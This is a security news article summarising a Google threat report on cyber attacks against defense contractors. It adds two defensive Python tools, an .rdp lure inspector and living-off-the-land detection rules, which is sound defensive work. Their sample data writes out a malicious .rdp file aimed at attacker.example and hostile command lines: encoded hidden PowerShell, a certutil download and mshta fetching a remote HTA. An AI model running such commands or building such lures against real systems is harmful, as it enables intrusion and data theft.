The defense industrial base (DIB), the companies that design, build and support military systems, remains one of the most intensely targeted sectors in global cyber operations. A recent report by Google Threat Intelligence Group (GTIG) details coordinated attacks against DIB enterprises and organizations by multiple groups: state-backed actors from China, Iran, North Korea and Russia; self-described hacktivists; and financially motivated cyber criminals. All of them pursue DIB targets with similar methods, but for different reasons.
Google attributes the current increase in attacks to four major trends:
1. Direct battlefield relevance of the targeted entities. Many of these groups specifically target defense contractors supplying technology used in the Russia-Ukraine conflict, especially contractors providing unmanned ground vehicles (UGVs), unmanned aerial vehicles (UAVs) or similar systems.
2. Human targeting and recruitment of insiders. North Korean and Iranian actors routinely approach individuals directly, usually through a fictitious job opportunity or a staged hiring process, to compromise their credentials and deliver a malware payload to the employee.
3. Exploitation of edge devices. China-linked actors use network appliances, virtualization platforms and other devices on the network perimeter as entry points, gaining access without being detected.
4. Manufacturing supply chain breaches. If a defense contractor depends on an upstream manufacturer for parts or services and that manufacturer is breached, the breach has downstream impact on the contractor.
The report also shows an increasing trend towards stealth: by limiting their targeting to individual systems, using living-off-the-land tactics and routing through compromised legitimate infrastructure, attackers are less likely to trigger alerts (<50%).
Notable actors and their tactics:
1. Russia-aligned
a. APT44 (Sandworm): physically accesses captured devices in Ukraine to extract Signal and Telegram data, using tools such as WAVESIGN, which decrypts data from the Signal desktop app.
b. UNC5125 (FlyingYeti / UAC-0149): targets frontline drone operators with Google Forms reconnaissance and malware delivered over messaging apps (MESSYFORK / COOKBOX); also deploys the Android trojan GREYBATTLE via fake websites posing as a Ukrainian military AI company.
c. UNC5792 and UNC4221: hijack Signal accounts through device linking, deliver the TINYWHALE downloader together with MeshAgent, and use STALECOOKIE, which mimics the DELTA battlefield management system, to steal cookies.
d. UNC5976 and UNC6096: phish with fake RDP files and WhatsApp-delivered LNK files; their Android malware GALLGRAB grabs data from battlefield apps.
2. China-aligned
a. UNC3236 (Volt Typhoon): scans the public login portals of North American defense contractors and uses ARCMAZE obfuscation to hide the origin of its activity.
b. UNC6508: abuses the upgrade process of REDCap software, via the INFINITERED backdoor, to maintain persistent access and steal user credentials.
c. APT5 (Keyhole Panda / Mulberry Typhoon): tailored phishing against current and former employees of major contractors.
d. ORB networks: China-aligned actors route reconnaissance traffic through operational relay box (ORB) networks built from compromised residential and commercial devices, which lets them evade geofencing and hampers attribution of the reconnaissance activity.
3. North Korea-aligned
a. UNC2970 (Lazarus): Operation Dream Job lures aerospace and defense workers with fake jobs; the group increasingly uses AI for target reconnaissance.
4. Iran-aligned
a. UNC1549 (Nimbus Manticore): targets Middle East aerospace and defense with MINIBIKE, TWOSTROKE, DEEPROOT and CRASHPAD, and also runs Dream Job-style operations.
b. UNC6446: distributes custom malware via fake resume builders and personality tests aimed at U.S. and Middle East aerospace and defense personnel.
5. North Korea-aligned actors focused on South Korea
a. APT45 (Andariel): SmallTiger malware hits South Korean defense, semiconductor and automotive manufacturing.
b. APT43 (Kimsuky): THINWAVE backdoor delivered via fake German and U.S. defense-related infrastructure.
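The fake RDP file lure attributed above to UNC5976 and UNC6096 is worth a concrete check, because a .rdp attachment that points at an attacker-controlled server and redirects the victim's drives, clipboard, smart cards and WebAuthn devices hands that server access to local resources the moment the user clicks "Connect". The following is an added example, not code from the GTIG report or the article: a small Python inspector for .rdp files. The page does not say which settings these particular actors use, so the checked settings are generic malicious-.rdp tradecraft, both sample files are constructed for illustration, and the corporate domain suffix is a placeholder assumption.

```python
"""Inspect .rdp files for settings abused in RDP-file phishing lures.

Added example, not code from the GTIG report or the article. The settings
checked are generic malicious-.rdp tradecraft (external server plus aggressive
device redirection); both sample files are constructed, and the internal
domain suffix is an assumption to be replaced with your own.
"""

# Constructed lure: what a malicious .rdp attachment typically looks like (assumption).
LURE_RDP = """\
screen mode id:i:2
full address:s:onboarding.attacker.example:3389
remoteapplicationmode:i:1
remoteapplicationname:s:Onboarding Portal
drivestoredirect:s:*
devicestoredirect:s:*
redirectclipboard:i:1
redirectprinters:i:1
redirectsmartcards:i:1
redirectwebauthn:i:1
authentication level:i:0
"""

# Constructed benign file: an internal jump host with no redirection.
BENIGN_RDP = """\
screen mode id:i:2
full address:s:jump01.corp.example
drivestoredirect:s:
redirectclipboard:i:0
authentication level:i:2
"""

INTERNAL_SUFFIXES = (".corp.example",)  # assumption: replace with your own domains


def parse_rdp(text):
    """Parse the key:type:value lines of a .rdp file into a dict.

    Type 'i' values become ints, 's' values stay strings; comment lines (';')
    and malformed lines are skipped. (IPv6 literals in 'full address' are not
    handled by the host split below.)
    """
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        parts = line.split(":", 2)
        if len(parts) != 3:
            continue
        key, typ, value = parts[0].strip().lower(), parts[1].strip().lower(), parts[2].strip()
        if typ == "i" and value.lstrip("-").isdigit():
            settings[key] = int(value)
        else:
            settings[key] = value
    return settings


def assess_rdp(settings, internal_suffixes=INTERNAL_SUFFIXES):
    """Return human-readable findings for settings a lure typically relies on."""
    findings = []
    host = str(settings.get("full address", "")).rsplit(":", 1)[0].lower()
    if host and not host.endswith(internal_suffixes):
        findings.append(f"connects to non-corporate host {host}")
    if str(settings.get("drivestoredirect", "")).strip():
        findings.append("redirects local drives to the remote server (drivestoredirect)")
    if str(settings.get("devicestoredirect", "")).strip():
        findings.append("redirects plug-and-play devices to the remote server (devicestoredirect)")
    for key, label in (
        ("redirectclipboard", "clipboard"),
        ("redirectprinters", "printers"),
        ("redirectsmartcards", "smart cards"),
        ("redirectwebauthn", "WebAuthn/passkey authenticators"),
    ):
        if settings.get(key) == 1:
            findings.append(f"redirects {label} to the remote server ({key})")
    if settings.get("remoteapplicationmode") == 1:
        findings.append("RemoteApp mode hides the remote desktop, so the user may not notice an open session")
    if settings.get("authentication level") == 0:
        findings.append("server certificate warnings disabled (authentication level 0)")
    return findings


def risk(text):
    """Parse and assess one .rdp file; return (verdict, findings)."""
    findings = assess_rdp(parse_rdp(text))
    verdict = "block" if len(findings) >= 3 else "review" if findings else "allow"
    return verdict, findings


if __name__ == "__main__":
    for name, text in (("lure", LURE_RDP), ("benign", BENIGN_RDP)):
        verdict, findings = risk(text)
        print(f"{name}: {verdict}")
        for finding in findings:
            print("  -", finding)
```

Wire `risk()` into mail-gateway attachment scanning or an EDR rule on `mstsc.exe` opening a `.rdp` from the Downloads folder; the "block" threshold of three findings is a starting point to tune against your own users' legitimate .rdp files.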
Financially motivated criminals also routinely extort DIB firms and their manufacturing suppliers, treating them like any other high-value vertical.
The defense industrial base faces a persistent, multi-vector siege. Nation-state espionage (especially targeting battlefield technology and drones used in Ukraine), insider recruitment operations, edge device exploitation and compromised manufacturing supply chains have created a uniquely difficult threat environment. According to Google, the specific hazards differ by geography and sub-sector, but pressure is expected to keep increasing as autonomous systems and AI-assisted warfare become more prevalent.
DIB organizations should consider prioritizing:
1. Hardening edge devices and virtualization platforms
2. Careful vetting and ongoing monitoring of third-party manufacturing partners
3. Strong controls around outreach to employees, particularly unsolicited job offers
4. Behavioral detection for evasion-heavy tactics such as living-off-the-land
5. Rapid patching and network segmentation of battlefield-relevant R&D environments
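Item 4 above, together with the stealth trend noted earlier (living-off-the-land tactics and compromised legitimate infrastructure), is where hash- and signature-based tooling struggles, because every binary involved is a legitimate, signed Windows component. The following is an added example, not code from the GTIG report or the article: a Python sketch of behavioral rules over process-creation telemetry that key on parent/child relationships and command-line shape instead of file identity. The rule set encodes well-known LOLBin abuse patterns, and the Sysmon-style sample events are constructed for illustration, not telemetry from any real incident.

```python
"""Behavioral detection for living-off-the-land (LOTL) process activity.

Added example, not code from the GTIG report or the article. The rules encode
well-known LOLBin abuse patterns (Office apps spawning script hosts, encoded or
hidden PowerShell, certutil and mshta used as downloaders, argument-less
rundll32); the sample events are constructed Sysmon-style process-creation
records, not real telemetry.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    host: str
    parent_image: str
    image: str
    command_line: str


OFFICE_APPS = {"outlook.exe", "winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Constructed sample telemetry (simplified Sysmon Event ID 1 fields).
SAMPLE_EVENTS = [
    ProcessEvent("ws-eng-07", r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
    ProcessEvent("ws-eng-07", r"C:\Windows\System32\cmd.exe",
                 r"C:\Windows\System32\certutil.exe",
                 "certutil.exe -urlcache -split -f http://203.0.113.45/update.dat C:\\Users\\Public\\update.dat"),
    ProcessEvent("ws-eng-12", r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\mshta.exe",
                 "mshta.exe https://203.0.113.45/form.hta"),
    ProcessEvent("ws-eng-12", r"C:\Windows\System32\svchost.exe",
                 r"C:\Windows\System32\rundll32.exe",
                 "rundll32.exe"),
    ProcessEvent("ws-eng-03", r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -File C:\\Scripts\\inventory.ps1"),
    ProcessEvent("ws-eng-03", r"C:\Windows\explorer.exe",
                 r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 'WINWORD.EXE /n "C:\\Users\\jdoe\\Documents\\SOW.docx"'),
]


def basename(path):
    """Lower-cased file name of a Windows path ('C:\\x\\y.exe' -> 'y.exe')."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(ev):
    """Return the names of the rules this event triggers (empty list if none)."""
    parent, image = basename(ev.parent_image), basename(ev.image)
    cmd = ev.command_line.lower()
    hits = []
    # Parent/child anomaly: mail or document apps should not launch script hosts.
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        hits.append("office_app_spawned_script_host")
    # Command-line shape: encoded payloads and hidden windows are evasion, not admin habit.
    if image in POWERSHELL and re.search(r"(^|\s)-(e|ec|en|enc|encodedcommand)\s", cmd):
        hits.append("encoded_powershell")
    if image in POWERSHELL and re.search(r"-w(indowstyle)?\s+hidden", cmd):
        hits.append("hidden_powershell_window")
    # Legitimate binaries repurposed as downloaders / loaders.
    if image == "certutil.exe" and "-urlcache" in cmd:
        hits.append("certutil_download")
    if image == "mshta.exe" and re.search(r"https?://", cmd):
        hits.append("mshta_remote_content")
    if image == "rundll32.exe" and cmd.strip() in {"rundll32.exe", "rundll32"}:
        hits.append("rundll32_no_arguments")
    return hits


def scan(events):
    """Run every rule over a batch of events; return (host, image, hits) for events that fired."""
    results = []
    for ev in events:
        hits = detect(ev)
        if hits:
            results.append((ev.host, basename(ev.image), hits))
    return results


if __name__ == "__main__":
    for host, image, hits in scan(SAMPLE_EVENTS):
        print(f"{host}: {image} -> {', '.join(hits)}")
```

The two benign events (an admin running a script by path, Word opened from Explorer) fire nothing, which is the point: the rules describe how attackers drive these binaries, not the binaries themselves. In production the same logic belongs in the SIEM or EDR rule language, with per-host baselining so that a known build server running `certutil -urlcache` does not page anyone.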
Source: The Hacker News
© 2016 - 2026 Red Secure Tech Ltd. Registered in England and Wales under Company Number: 15581067